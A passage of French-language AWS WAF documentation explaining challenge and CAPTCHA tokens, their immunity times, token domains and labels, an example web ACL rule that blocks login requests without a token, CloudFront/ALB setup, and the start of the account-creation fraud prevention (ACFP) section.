  + **Challengeaction de la règle** — Pour plus d'informations, consultez[CAPTCHAet Challenge dans AWS WAF](waf-captcha-and-challenge.md).
  + **CAPTCHA**— Lorsqu'un interstitiel CAPTCHA s'exécute, si le client n'a pas encore de jeton, le script lance d'abord automatiquement un défi, afin de vérifier la session du client et d'initialiser le jeton. 

Les jetons sont requis par de nombreuses règles des groupes de règles de règles de AWS gestion des menaces intelligentes. Les règles utilisent des jetons pour distinguer les clients au niveau de la session, pour déterminer les caractéristiques du navigateur et pour comprendre le niveau d'interactivité humaine sur la page Web de l'application. Ces groupes de règles font appel à la gestion des AWS WAF jetons, qui applique un étiquetage des jetons que les groupes de règles inspectent ensuite. 
+ **AWS WAF Contrôle des fraudes, création de comptes, prévention de la fraude (ACFP)** : les règles de l'ACFP exigent des requêtes Web avec des jetons valides. Pour plus d'informations sur les règles, consultez[AWS WAF Groupe de règles de prévention de la fraude (ACFP) pour la création de comptes et la prévention des fraudes](aws-managed-rule-groups-acfp.md).
+ **AWS WAF Prévention du piratage de compte (ATP) contre la fraude** : les règles ATP qui empêchent les sessions client à volume élevé et de longue durée nécessitent des requêtes Web contenant un jeton valide avec un horodatage de défi non expiré. Pour de plus amples informations, veuillez consulter [AWS WAF Groupe de règles de prévention des prises de contrôle des fraudes (ATP)](aws-managed-rule-groups-atp.md).
+ **AWS WAF Contrôle des robots** : les règles ciblées de ce groupe de règles limitent le nombre de requêtes Web qu'un client peut envoyer sans jeton valide, et elles utilisent le suivi des sessions par jeton pour la surveillance et la gestion au niveau des sessions. Selon les besoins, les règles appliquent les actions Challenge et CAPTCHA règles pour renforcer l'acquisition de jetons et le comportement valide des clients. Pour de plus amples informations, veuillez consulter [AWS WAF Groupe de règles Bot Control](aws-managed-rule-groups-bot.md).

# AWS WAF caractéristiques du jeton
<a name="waf-tokens-details"></a>

Chaque jeton possède les caractéristiques suivantes : 
+ Le jeton est stocké dans un cookie nommé`aws-waf-token`.
+ Le jeton est crypté.
+ Le jeton imprime à la session client un identifiant granulaire permanent contenant les informations suivantes : 
  + Horodatage de la dernière réponse réussie du client à un défi silencieux. 
  + Horodatage de la dernière réponse réussie de l'utilisateur final à un CAPTCHA. Ceci n'est présent que si vous utilisez le CAPTCHA dans vos protections. 
  + Informations supplémentaires sur le client et son comportement qui peuvent aider à séparer vos clients légitimes du trafic indésirable. Les informations comprennent divers identifiants clients et signaux côté client qui peuvent être utilisés pour détecter les activités automatisées. Les informations recueillies ne sont pas uniques et ne peuvent pas être associées à un être humain individuel. 
    + Tous les jetons incluent des données issues de l'interrogation du navigateur client, telles que des indications d'automatisation et des incohérences dans les paramètres du navigateur. Ces informations sont récupérées par les scripts exécutés par l'Challengeaction et par l'application cliente SDKs. Les scripts interrogent activement le navigateur et placent les résultats dans le jeton. 
    + En outre, lorsque vous implémentez un SDK d'intégration d'applications clientes, le jeton inclut des informations collectées passivement sur l'interactivité de l'utilisateur final avec la page de l'application. L'interactivité inclut les mouvements de souris, les pressions sur les touches et les interactions avec tout formulaire HTML présent sur la page. Ces informations permettent de AWS WAF détecter le niveau d'interactivité humaine chez le client, afin de défier les utilisateurs qui ne semblent pas être des humains. Pour plus d'informations sur les intégrations côté client, consultez[Intégrations d'applications clientes dans AWS WAF](waf-application-integration.md).

Pour des raisons de sécurité, AWS ne fournit pas de description complète du contenu des AWS WAF jetons ni d'informations détaillées sur le processus de chiffrement des jetons. 

# Configuration de l'expiration de l'horodatage et de la durée d'immunité des jetons dans AWS WAF
<a name="waf-tokens-immunity-times"></a>

Cette section explique comment expirent les horodatages des défis et des CAPTCHA.

AWS WAF utilise les temps de challenge et d'immunité aux CAPTCHA pour contrôler la fréquence à laquelle une session client unique peut être associée à un défi ou à un CAPTCHA. Une fois qu'un utilisateur final a répondu avec succès à un CAPTCHA, la durée d'immunité au CAPTCHA détermine la durée pendant laquelle l'utilisateur final reste immunisé contre la présentation d'un autre CAPTCHA. De même, la durée d'immunité au défi détermine la durée pendant laquelle une session client reste à l'abri d'une nouvelle contestation après avoir répondu avec succès à un défi. 

**Comment fonctionnent les délais d'immunité AWS WAF symbolique**

AWS WAF enregistre une réponse réussie à un défi ou à un CAPTCHA en mettant à jour l'horodatage correspondant à l'intérieur du jeton. Lorsqu'il AWS WAF inspecte le jeton à la recherche d'un challenge ou d'un CAPTCHA, il soustrait l'horodatage de l'heure actuelle. Si le résultat est supérieur à la durée d'immunité configurée, l'horodatage est expiré. 

**Aspects configurables des AWS WAF durées d'immunité des jetons**

Vous pouvez configurer les durées d'immunité aux défis et aux CAPTCHA dans le pack de protection (ACL Web) ainsi que dans toute règle utilisant l'action de Challenge règle CAPTCHA or. 
+ Le paramètre par défaut du pack de protection (ACL Web) pour les deux durées d'immunité est de 300 secondes. 
+ Vous pouvez spécifier la durée d'immunité pour toute règle utilisant l'Challengeaction CAPTCHA ou. Si vous ne spécifiez pas la durée d'immunité pour la règle, elle hérite du paramètre du pack de protection (ACL Web). 
+ Pour une règle au sein d'un groupe de règles qui utilise l'Challengeaction CAPTCHA ou, si vous ne spécifiez pas le délai d'immunité pour la règle, elle héritera du paramètre de chaque pack de protection (ACL Web) dans lequel vous utilisez le groupe de règles.
+ L'intégration de l'application SDKs utilise le temps d'immunité aux défis du pack de protection (ACL Web). 
+ La valeur minimale de la durée d'immunité aux défis est de 300 secondes. La valeur minimale de la durée d'immunité au CAPTCHA est de 60 secondes. La valeur maximale pour les deux durées d'immunité est de 259 200 secondes, soit trois jours. 

Vous pouvez utiliser le pack de protection (ACL Web) et les paramètres de durée d'immunité au niveau des règles pour ajuster l'CAPTCHAaction ou le comportement de gestion des défis du SDK. Challenge Par exemple, vous pouvez configurer des règles qui contrôlent l'accès aux données très sensibles avec des durées d'immunité faibles, puis définir des durées d'immunité plus élevées dans votre pack de protection (ACL Web) pour vos autres règles et celles dont vous hériterez. SDKs 

En particulier dans le cas du CAPTCHA, résoudre un casse-tête peut dégrader l'expérience de votre client sur le site Web. Le réglage de la durée d'immunité du CAPTCHA peut donc vous aider à atténuer l'impact sur l'expérience client tout en fournissant les protections que vous souhaitez. 

Pour plus d'informations sur le réglage des durées d'immunité en fonction de votre utilisation des actions Challenge et des CAPTCHA règles, consultez[Bonnes pratiques d'utilisation des Challenge actions CAPTCHA et](waf-captcha-and-challenge-best-practices.md).

# Où définir les durées d'immunité des AWS WAF jetons
<a name="waf-tokens-immunity-times-setting"></a>

Vous pouvez définir les durées d'immunité dans votre pack de protection (ACL Web) et dans vos règles qui utilisent les actions de CAPTCHA règles Challenge et. 

Pour obtenir des informations générales sur la gestion d'un pack de protection (ACL Web) et de ses règles, consultez[Affichage des statistiques du trafic Web dans AWS WAF](web-acl-working-with.md).

**Où définir la durée d'immunité pour un pack de protection (ACL Web)**
+ **Console** — Lorsque vous modifiez le pack de protection (ACL Web), dans l'onglet **Règles**, modifiez et modifiez les paramètres dans les volets de **configuration CAPTCHA du pack de protection (ACL Web)** et du **défi du pack de protection (ACL Web)**. Dans la console, vous pouvez configurer le CAPTCHA du pack de protection (ACL Web) et contester les durées d'immunité uniquement après avoir créé le pack de protection (ACL Web).
+ **En dehors de la console** : le type de données du pack de protection (ACL Web) contient des paramètres de configuration CAPTCHA et de défi, que vous pouvez configurer et fournir lors de vos opérations de création et de mise à jour sur le pack de protection (ACL Web). 

**Où définir la durée d'immunité pour une règle**
+ **Console** — Lorsque vous créez ou modifiez une règle et que vous spécifiez l'Challengeaction CAPTCHA ou, vous pouvez modifier le paramètre de durée d'immunité de la règle. 
+ **En dehors de la console** : le type de données de règle comporte des paramètres de configuration CAPTCHA et de défi, que vous pouvez configurer lorsque vous définissez la règle. 

# Spécification de domaines de jetons et de listes de domaines dans AWS WAF
<a name="waf-tokens-domains"></a>

Cette section explique comment configurer les domaines qui AWS WAF utilisent des jetons et qu'il accepte des jetons.

Lorsqu'il AWS WAF crée un jeton pour un client, il le configure avec un domaine de jetons. Lorsqu'il AWS WAF inspecte un jeton dans une requête Web, il le rejette comme non valide si son domaine ne correspond à aucun des domaines considérés comme valides pour le pack de protection (ACL Web). 

Par défaut, AWS WAF n'accepte que les jetons dont le paramètre de domaine correspond exactement au domaine hôte de la ressource associée au pack de protection (ACL Web). Il s'agit de la valeur de l'`Host`en-tête de la requête Web. Dans un navigateur, vous pouvez trouver ce domaine dans la JavaScript `window.location.hostname` propriété et dans l'adresse que votre utilisateur voit dans sa barre d'adresse. 

Vous pouvez également spécifier des domaines de jetons acceptables dans la configuration de votre pack de protection (ACL Web), comme décrit dans la section suivante. Dans ce cas, AWS WAF accepte à la fois les correspondances exactes avec l'en-tête de l'hôte et les correspondances avec les domaines de la liste des domaines de jetons.

Vous pouvez spécifier les domaines de jetons AWS WAF à utiliser lors de la configuration du domaine et lors de l'évaluation d'un jeton dans un pack de protection (ACL Web). Les domaines que vous spécifiez ne peuvent pas être des suffixes publics tels que. `gov.au` Pour les domaines que vous ne pouvez pas utiliser, consultez la liste [https://publicsuffix.org/list/public_suffix_list.dat](https://publicsuffix.org/list/public_suffix_list.dat) sous Liste des [suffixes publics](https://publicsuffix.org/list/).

## AWS WAF configuration de la liste de domaines de jetons du pack de protection (ACL Web)
<a name="waf-tokens-domain-lists"></a>

Vous pouvez configurer un pack de protection (ACL Web) pour partager des jetons entre plusieurs ressources protégées en fournissant une liste de domaines de jetons avec les domaines supplémentaires que vous AWS WAF souhaitez accepter. Avec une liste de domaines de jetons, accepte AWS WAF toujours le domaine hôte de la ressource. En outre, il accepte tous les domaines de la liste des domaines symboliques, y compris leurs sous-domaines préfixés. 

Par exemple, une spécification `example.com` de domaine de votre liste de domaines de jetons correspond à `example.com` (from`http://example.com/`)`api.example.com`, (from`http://api.example.com/`) et `www.example.com` (from`http://www.example.com/`). Il ne correspond pas à`example.api.com`, (de`http://example.api.com/`) ou `apiexample.com` (de`http://apiexample.com/`).

Vous pouvez configurer la liste des domaines de jetons dans votre pack de protection (ACL Web) lorsque vous le créez ou le modifiez. Pour des informations générales sur la gestion d'un pack de protection (ACL Web), consultez[Affichage des statistiques du trafic Web dans AWS WAF](web-acl-working-with.md).

## AWS WAF paramètres de domaine de jetons
<a name="waf-tokens-domain-in-token"></a>

AWS WAF crée des jetons à la demande des scripts de défi, qui sont exécutés par les actions d'intégration SDKs de l'application Challenge et de CAPTCHA règles. 

Le domaine qui AWS WAF définit un jeton est déterminé par le type de script de défi qui le demande et par toute configuration de domaine de jeton supplémentaire que vous fournissez. AWS WAF définit le domaine du jeton selon le paramètre le plus court et le plus général qu'il puisse trouver dans la configuration.
+ **JavaScript SDK** — Vous pouvez configurer le JavaScript SDK avec une spécification de domaine jeton, qui peut inclure un ou plusieurs domaines. Les domaines que vous configurez doivent être des domaines qui AWS WAF seront acceptés, sur la base du domaine hôte protégé et de la liste des domaines de jetons du pack de protection (ACL Web). 

  Lorsqu'il AWS WAF émet un jeton pour le client, il définit le domaine du jeton sur celui qui correspond au domaine hôte et qui est le plus court, parmi le domaine hôte et les domaines de votre liste configurée. Par exemple, si le domaine hôte est, `api.example.com` et la liste des domaines de jetons`example.com`, AWS WAF utilise `example.com` le jeton, car il correspond au domaine hôte et est plus court. Si vous ne fournissez pas de liste de domaines de jetons dans la configuration de l' JavaScript AWS WAF API, définissez le domaine sur le domaine hôte de la ressource protégée.

  Pour de plus amples informations, veuillez consulter [Fournir des domaines à utiliser dans les jetons](waf-js-challenge-api-set-token-domain.md). 
+ **SDK mobile** — Dans le code de votre application, vous devez configurer le SDK mobile avec une propriété de domaine jeton. Cette propriété doit être un domaine qui AWS WAF acceptera, sur la base du domaine hôte protégé et de la liste des domaines de jetons du pack de protection (ACL Web). 

  Lorsqu'il AWS WAF émet un jeton pour le client, celui-ci utilise cette propriété comme domaine du jeton. AWS WAF n'utilise pas le domaine hôte dans les jetons qu'il émet pour le client du SDK mobile. 

  Pour plus d'informations, consultez le `WAFConfiguration` `domainName` paramètre sur[AWS WAF spécification du SDK mobile](waf-mobile-sdk-specification.md). 
+ **Challengeaction** — Si vous spécifiez une liste de domaines de jetons dans le pack de protection (ACL Web AWS WAF ), définissez le domaine de jetons sur celui qui correspond au domaine hôte et qui est le plus court, parmi le domaine hôte et les domaines de la liste. Par exemple, si le domaine hôte est, `api.example.com` et la liste des domaines de jetons`example.com`, AWS WAF utilise `example.com` le jeton, car il correspond au domaine hôte et est plus court. Si vous ne fournissez pas de liste de domaines à jetons dans le pack de protection (ACL Web) AWS WAF , définissez le domaine sur le domaine hôte de la ressource protégée. 

# Types d'étiquettes à jetons dans AWS WAF
<a name="waf-tokens-labeling"></a>

Cette section décrit les étiquettes que la gestion des AWS WAF jetons ajoute aux requêtes Web. Pour des informations générales sur les étiquettes, voir[Étiquetage des requêtes Web dans AWS WAF](waf-labels.md).

Lorsque vous utilisez l'un des AWS WAF robots ou des groupes de règles gérés par le contrôle de la fraude, les groupes de règles utilisent la gestion des AWS WAF jetons pour inspecter les jetons de requête Web et appliquer un étiquetage de jeton aux demandes. Pour plus d'informations sur les groupes de règles gérés, reportez-vous aux [AWS WAF Groupe de règles de prévention des prises de contrôle des fraudes (ATP)](aws-managed-rule-groups-atp.md) sections[AWS WAF Groupe de règles de prévention de la fraude (ACFP) pour la création de comptes et la prévention des fraudes](aws-managed-rule-groups-acfp.md), et[AWS WAF Groupe de règles Bot Control](aws-managed-rule-groups-bot.md).

**Note**  
AWS WAF applique des étiquettes de jetons uniquement lorsque vous utilisez l'un de ces groupes de règles gérés d'atténuation intelligente des menaces. 

La gestion des jetons peut ajouter les libellés suivants aux requêtes Web.

**Libellé de session client**  
L'étiquette `awswaf:managed:token:id:identifier` contient un identifiant unique que la gestion des AWS WAF jetons utilise pour identifier la session client. L'identifiant peut changer si le client acquiert un nouveau jeton, par exemple après avoir supprimé le jeton qu'il utilisait. 

**Note**  
AWS WAF ne communique pas CloudWatch les statistiques Amazon pour cette étiquette.

**Étiquette d'empreinte digitale du navigateur**  
L'étiquette `awswaf:managed:token:fingerprint:fingerprint-identifier` contient un identifiant d'empreinte digitale robuste que la gestion des AWS WAF jetons calcule à partir de divers signaux du navigateur client. Cet identifiant reste le même lors de plusieurs tentatives d'acquisition de jetons. L'identifiant d'empreinte digitale n'est pas propre à un seul client.

**Note**  
AWS WAF ne communique pas CloudWatch les statistiques Amazon pour cette étiquette.

**Étiquettes d'état des jetons : préfixes d'espace de noms d'étiquettes**  
Les étiquettes d'état du jeton indiquent le statut du jeton ainsi que les informations relatives au défi et au CAPTCHA qu'il contient. 

Chaque étiquette de statut de jeton commence par l'un des préfixes d'espace de noms suivants : 
+ `awswaf:managed:token:`— Utilisé pour signaler l'état général du jeton et pour rendre compte de l'état des informations de défi du jeton. 
+ `awswaf:managed:captcha:`— Utilisé pour rendre compte de l'état des informations CAPTCHA du jeton. 

**Étiquettes d'état des jetons : noms des étiquettes**  
Après le préfixe, le reste de l'étiquette fournit des informations détaillées sur l'état du jeton : 
+ `accepted`— Le jeton de demande est présent et contient les éléments suivants : 
  + Un défi ou une solution CAPTCHA valide.
  + Un défi ou un horodatage CAPTCHA non expiré.
  + Spécification de domaine valide pour le pack de protection (ACL Web). 

  Exemple : L'étiquette `awswaf:managed:token:accepted` indique que le jeton des requêtes Web contient une solution de défi valide, un horodatage de défi non expiré et un domaine valide.
+ `rejected`— Le jeton de demande est présent mais ne répond pas aux critères d'acceptation. 

  Outre l'étiquette rejetée, la gestion des jetons ajoute un espace de noms et un nom d'étiquette personnalisés pour en indiquer la raison. 
  + `rejected:not_solved`— Le challenge ou la solution CAPTCHA ne sont pas présents dans le jeton. 
  + `rejected:expired`— L'horodatage du challenge ou du CAPTCHA du jeton a expiré, conformément aux durées d'immunité des jetons configurées par votre pack de protection (ACL Web). 
  + `rejected:domain_mismatch`— Le domaine du jeton ne correspond pas à la configuration du domaine du jeton de votre pack de protection (ACL Web). 
  + `rejected:invalid`— AWS WAF n'a pas pu lire le jeton indiqué. 

  Exemple : `awswaf:managed:captcha:rejected:expired` ensemble, les `awswaf:managed:captcha:rejected` libellés indiquent que la demande ne comportait pas de résolution CAPTCHA valide car l'horodatage CAPTCHA figurant dans le jeton a dépassé le délai d'immunité du jeton CAPTCHA configuré dans le pack de protection (ACL Web).
+ `absent`— La demande ne contient pas le jeton ou le gestionnaire de jetons n'a pas pu le lire. 

  Exemple : L'étiquette `awswaf:managed:captcha:absent` indique que la demande ne contient pas le jeton. 

# Blocage des demandes dont le AWS WAF jeton n'est pas valide
<a name="waf-tokens-block-missing-tokens"></a>

Cette section explique comment bloquer les demandes de connexion dont les jetons sont manquants lors de l'utilisation du SDK AWS WAF mobile.

Lorsque vous utilisez la menace intelligente AWS Managed Rules`AWSManagedRulesACFPRuleSet`, les groupes de règles et `AWSManagedRulesATPRuleSet``AWSManagedRulesBotControlRuleSet`, les groupes de règles invoquent la gestion des AWS WAF jetons pour évaluer le statut du jeton de requête Web et étiqueter les demandes en conséquence. 

**Note**  
L'étiquetage des jetons s'applique uniquement aux demandes Web que vous évaluez à l'aide de l'un de ces groupes de règles gérés.

Pour plus d'informations sur l'étiquetage appliqué par la gestion des jetons, consultez la section précédente,[Types d'étiquettes à jetons dans AWS WAF](waf-tokens-labeling.md). 

Les groupes de règles gérés d'atténuation intelligente des menaces gèrent ensuite les exigences en matière de jetons comme suit :
+ La `AWSManagedRulesACFPRuleSet` `AllRequests` règle est configurée pour exécuter l'Challengeaction sur toutes les demandes, bloquant ainsi efficacement celles qui ne possèdent pas l'étiquette du `accepted` jeton. 
+ Le `AWSManagedRulesATPRuleSet` bloque les demandes portant le libellé du `rejected` jeton, mais il ne bloque pas les demandes portant le libellé du `absent` jeton. 
+ Le niveau de protection `AWSManagedRulesBotControlRuleSet` ciblé pose un défi aux clients après avoir envoyé cinq demandes sans étiquette de `accepted` jeton. Il ne bloque pas une demande individuelle dont le jeton n'est pas valide. Le niveau de protection commun du groupe de règles ne gère pas les exigences en matière de jetons. 

Pour plus de détails sur les groupes de règles de menaces intelligentes[AWS WAF Groupe de règles de prévention de la fraude (ACFP) pour la création de comptes et la prévention des fraudes](aws-managed-rule-groups-acfp.md), reportez-vous aux sections [AWS WAF Groupe de règles de prévention des prises de contrôle des fraudes (ATP)](aws-managed-rule-groups-atp.md) et[AWS WAF Groupe de règles Bot Control](aws-managed-rule-groups-bot.md). 

**Pour bloquer les demandes auxquelles il manque des jetons lors de l'utilisation du groupe de règles géré par Bot Control ou ATP**  
Avec les groupes de règles Bot Control et ATP, il est possible qu'une demande sans jeton valide quitte l'évaluation du groupe de règles et continue d'être évaluée par le pack de protection (ACL Web). 

Pour bloquer toutes les demandes dont le jeton est manquant ou dont le jeton est rejeté, ajoutez une règle à exécuter immédiatement après le groupe de règles géré afin de capturer et de bloquer les demandes que le groupe de règles ne gère pas pour vous. 

Voici un exemple de liste JSON pour un pack de protection (ACL Web) qui utilise le groupe de règles géré par ATP. Le pack de protection (ACL Web) comporte une règle supplémentaire pour capturer l'`awswaf:managed:token:absent`étiquette et la gérer. La règle limite son évaluation aux demandes Web destinées au point de terminaison de connexion, afin de correspondre à l'étendue du groupe de règles ATP. La règle ajoutée est indiquée en gras. 

```
{
  "Name": "exampleWebACL",
  "Id": "55555555-6666-7777-8888-999999999999",
  "ARN": "arn:aws:wafv2:us-east-1:111111111111:regional/webacl/exampleWebACL/55555555-4444-3333-2222-111111111111",
  "DefaultAction": {
    "Allow": {}
  },
  "Description": "",
  "Rules": [
    {
      "Name": "AWS-AWSManagedRulesATPRuleSet",
      "Priority": 1,
      "Statement": {
        "ManagedRuleGroupStatement": {
          "VendorName": "AWS",
          "Name": "AWSManagedRulesATPRuleSet",
          "ManagedRuleGroupConfigs": [
            {
              "AWSManagedRulesATPRuleSet": {
                "LoginPath": "/web/login",
                "RequestInspection": {
                  "PayloadType": "JSON",
                  "UsernameField": {
                    "Identifier": "/form/username"
                  },
                  "PasswordField": {
                    "Identifier": "/form/password"
                  }
                },
                "ResponseInspection": {
                  "StatusCode": {
                    "SuccessCodes": [
                      200
                    ],
                    "FailureCodes": [
                      401,
                      403,
                      500
                    ]
                  }
                }
              }  
            }
          ]
        }
      },
      "OverrideAction": {
        "None": {}
      },
      "VisibilityConfig": {
        "SampledRequestsEnabled": true,
        "CloudWatchMetricsEnabled": true,
        "MetricName": "AWS-AWSManagedRulesATPRuleSet"
      }
    },
    {
      "Name": "RequireTokenForLogins",
      "Priority": 2,
      "Statement": {
        "AndStatement": {
          "Statements": [
            {
              "Statement": {
                "LabelMatchStatement": {
                  "Scope": "LABEL",
                  "Key": "awswaf:managed:token:absent"
                }
              }
            },
            {
              "ByteMatchStatement": {
                "SearchString": "/web/login",
                "FieldToMatch": {
                  "UriPath": {}
                },
                "TextTransformations": [
                  {
                    "Priority": 0,
                    "Type": "NONE"
                 }
                ],
                "PositionalConstraint": "STARTS_WITH"
              }
            },
            {
              "ByteMatchStatement": {
                "SearchString": "POST",
                "FieldToMatch": {
                  "Method": {}
                },
                "TextTransformations": [
                  {
                    "Priority": 0,
                    "Type": "NONE"
                  }
                ],
                "PositionalConstraint": "EXACTLY"
              }
            }
          ]
        }
      },
      "Action": {
        "Block": {}
      },
      "VisibilityConfig": {
        "SampledRequestsEnabled": true,
        "CloudWatchMetricsEnabled": true,
        "MetricName": "RequireTokenForLogins"
      } 
    }
  ],
  "VisibilityConfig": {
    "SampledRequestsEnabled": true,
    "CloudWatchMetricsEnabled": true,
    "MetricName": "exampleWebACL"
  },
  "Capacity": 51,
  "ManagedByFirewallManager": false,
  "RetrofittedByFirewallManager": false,
  "LabelNamespace": "awswaf:111111111111:webacl:exampleWebACL:"
}
```

# Configuration requise pour les équilibreurs de charge d'application qui sont des origines CloudFront
<a name="waf-tokens-with-alb-and-cf"></a>

Lisez cette section si vous associez votre pack de protection (ACL Web) à un Application Load Balancer et que vous déployez l'Application Load Balancer comme origine d'une distribution. CloudFront 

Avec cette architecture, vous devez fournir la configuration supplémentaire suivante pour que les informations du jeton soient traitées correctement.
+ Configurez CloudFront pour transférer le `aws-waf-token` cookie vers l'Application Load Balancer. CloudFront Supprime par défaut les cookies de la requête Web avant de la transmettre à l'origine. Pour conserver le cookie jeton dans la requête Web, configurez le comportement du CloudFront cache pour inclure uniquement le cookie jeton ou tous les cookies. Pour plus d'informations sur la procédure à suivre, consultez la section [Mise en cache du contenu basé sur les cookies](https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/Cookies.html) dans le manuel *Amazon CloudFront Developer Guide*.
+ Configurez de AWS WAF manière à ce qu'il reconnaisse le domaine de la CloudFront distribution comme un domaine de jeton valide. Par défaut, CloudFront définit l'`Host`en-tête sur l'origine de l'Application Load Balancer et l' AWS WAF utilise comme domaine de la ressource protégée. Le navigateur client considère toutefois la CloudFront distribution comme le domaine hôte, et les jetons générés pour le client utilisent le CloudFront domaine comme domaine de jeton. Sans configuration supplémentaire, lorsque le domaine AWS WAF de ressources protégé est comparé au domaine de jeton, il y aura une incompatibilité. Pour résoudre ce problème, ajoutez le nom de domaine de CloudFront distribution à la liste des domaines de jetons dans la configuration de votre pack de protection (ACL Web). Pour plus d'informations sur la procédure à utiliser, consultez [AWS WAF configuration de la liste de domaines de jetons du pack de protection (ACL Web)](waf-tokens-domains.md#waf-tokens-domain-lists).

# AWS WAF Contrôle des fraudes : création de comptes, prévention des fraudes (ACFP)
<a name="waf-acfp"></a>

Cette section explique en quoi consiste AWS WAF la prévention de la fraude (ACFP) lors de la création de comptes Fraud Control.

La fraude liée à la création de compte est une activité illégale en ligne dans le cadre de laquelle un attaquant tente de créer un ou plusieurs faux comptes. Les attaquants utilisent de faux comptes pour des activités frauduleuses, telles que l'utilisation abusive de bonus promotionnels et d'inscription, l'usurpation d'identité de quelqu'un et des cyberattaques telles que le phishing. La présence de faux comptes peut avoir un impact négatif sur votre entreprise en portant atteinte à votre réputation auprès des clients et en vous exposant à des fraudes financières. 

Vous pouvez surveiller et contrôler les tentatives de fraude liées à la création de comptes en implémentant la fonctionnalité ACFP. AWS WAF propose cette fonctionnalité dans le groupe de règles AWS Managed Rules `AWSManagedRulesACFPRuleSet` avec intégration d'applications complémentaires SDKs. 

L'ACFP a géré les groupes de règles pour étiqueter et gérer les demandes susceptibles de faire partie de tentatives de création de compte malveillantes. Pour ce faire, le groupe de règles inspecte les tentatives de création de compte que les clients envoient au point de terminaison de création de compte de votre application. 

L'ACFP protège les pages d'ouverture de votre compte en surveillant les demandes d'ouverture de compte pour détecter toute activité anormale et en bloquant automatiquement les demandes suspectes. Le groupe de règles utilise des identifiants de demande, une analyse comportementale et l'apprentissage automatique pour détecter les demandes frauduleuses. 
+ **Inspection des demandes — L'**ACFP vous donne de la visibilité et un contrôle sur les tentatives de création de compte anormales et les tentatives utilisant des informations d'identification volées, afin d'empêcher la création de comptes frauduleux. L'ACFP vérifie les combinaisons d'e-mails et de mots de passe par rapport à sa base de données d'identifiants volés, qui est régulièrement mise à jour à mesure que de nouvelles informations d'identification divulguées sont découvertes sur le Dark Web. L'ACFP évalue les domaines utilisés dans les adresses e-mail et surveille l'utilisation des numéros de téléphone et des champs d'adresse afin de vérifier les entrées et de détecter les comportements frauduleux. L'ACFP agrège les données par adresse IP et par session client afin de détecter et de bloquer les clients qui envoient trop de demandes suspectes. 
+ **Inspection des réponses** — Pour les CloudFront distributions, en plus d'inspecter les demandes de création de compte entrantes, le groupe de règles ACFP inspecte les réponses de votre application aux tentatives de création de compte, afin de suivre les taux de réussite et d'échec. À l'aide de ces informations, l'ACFP peut bloquer temporairement les sessions client ou les adresses IP dont trop de tentatives ont échoué. AWS WAF effectue une inspection des réponses de manière asynchrone, afin de ne pas augmenter la latence de votre trafic Web. 

**Note**  
Des frais supplémentaires vous sont facturés lorsque vous utilisez ce groupe de règles géré. Pour plus d’informations, consultez [Tarification d’AWS WAF](https://aws.amazon.com/waf/pricing/).

**Note**  
La fonctionnalité ACFP n'est pas disponible pour les groupes d'utilisateurs Amazon Cognito.

**Topics**
+ [AWS WAF Composants ACFP](waf-acfp-components.md)
+ [Utilisation de l'intégration d'applications SDKs avec ACFP](waf-acfp-with-tokens.md)
+ [Ajouter le groupe de règles géré par l'ACFP à votre ACL Web](waf-acfp-rg-using.md)
+ [Test et déploiement de l'ACFP](waf-acfp-deploying.md)
+ [AWS WAF Exemples de création de comptes Fraud Control et de prévention de la fraude (ACFP)](waf-acfp-control-examples.md)

# AWS WAF Composants ACFP
<a name="waf-acfp-components"></a>

Les principaux éléments de la prévention de AWS WAF la fraude (ACFP) lors de la création de comptes Fraud Control sont les suivants : 
+ **`AWSManagedRulesACFPRuleSet`**— Les règles de ce groupe de règles AWS gérées détectent, étiquettent et traitent différents types d'activités de création de comptes frauduleuses. Le groupe de règles inspecte les `GET` text/html demandes HTTP que les clients envoient au point de terminaison d'enregistrement de compte spécifié et les demandes `POST` Web que les clients envoient au point de terminaison d'inscription de compte spécifié. Pour les CloudFront distributions protégées, le groupe de règles inspecte également les réponses que la distribution renvoie aux demandes de création de compte. Pour obtenir la liste des règles de ce groupe de règles, consultez[AWS WAF Groupe de règles de prévention de la fraude (ACFP) pour la création de comptes et la prévention des fraudes](aws-managed-rule-groups-acfp.md). Vous incluez ce groupe de règles dans votre pack de protection (ACL Web) à l'aide d'une déclaration de référence de groupe de règles géré. Pour plus d'informations sur l'utilisation de ce groupe de règles, consultez[Ajouter le groupe de règles géré par l'ACFP à votre ACL Web](waf-acfp-rg-using.md). 
**Note**  
Des frais supplémentaires vous sont facturés lorsque vous utilisez ce groupe de règles géré. Pour plus d’informations, consultez [Tarification d’AWS WAF](https://aws.amazon.com/waf/pricing/).
+ **Informations sur les pages d'enregistrement et de création de compte de votre application** : vous devez fournir des informations sur les pages d'enregistrement et de création de votre compte lorsque vous ajoutez le groupe de `AWSManagedRulesACFPRuleSet` règles à votre pack de protection (ACL Web). Cela permet au groupe de règles de restreindre la portée des demandes qu'il inspecte et de valider correctement les demandes Web de création de compte. La page d'inscription doit accepter les `GET` text/html demandes. Le chemin de création du compte doit accepter les `POST` demandes. Le groupe de règles ACFP fonctionne avec les noms d'utilisateur au format e-mail. Pour de plus amples informations, veuillez consulter [Ajouter le groupe de règles géré par l'ACFP à votre ACL Web](waf-acfp-rg-using.md). 
+ **Pour les CloudFront distributions protégées, détails sur la façon dont votre application répond aux tentatives de création de compte** : vous fournissez des détails sur les réponses de votre application aux tentatives de création de compte, et le groupe de règles ACFP suit et gère les tentatives de création de comptes en masse à partir d'une seule adresse IP ou d'une seule session client. Pour plus d'informations sur la configuration de cette option, consultez[Ajouter le groupe de règles géré par l'ACFP à votre ACL Web](waf-acfp-rg-using.md). 
+ **JavaScript et intégration d'applications mobiles SDKs** : implémentez le AWS WAF JavaScript et mobile SDKs avec votre implémentation ACFP pour activer l'ensemble complet des fonctionnalités proposées par le groupe de règles. De nombreuses règles ACFP utilisent les informations fournies par la vérification des clients au niveau de la SDKs session et l'agrégation des comportements, nécessaires pour séparer le trafic client légitime du trafic des robots. Pour plus d'informations sur le SDKs, consultez[Intégrations d'applications clientes dans AWS WAF](waf-application-integration.md).

Vous pouvez combiner votre implémentation ACFP avec les éléments suivants pour vous aider à surveiller, régler et personnaliser vos protections. 
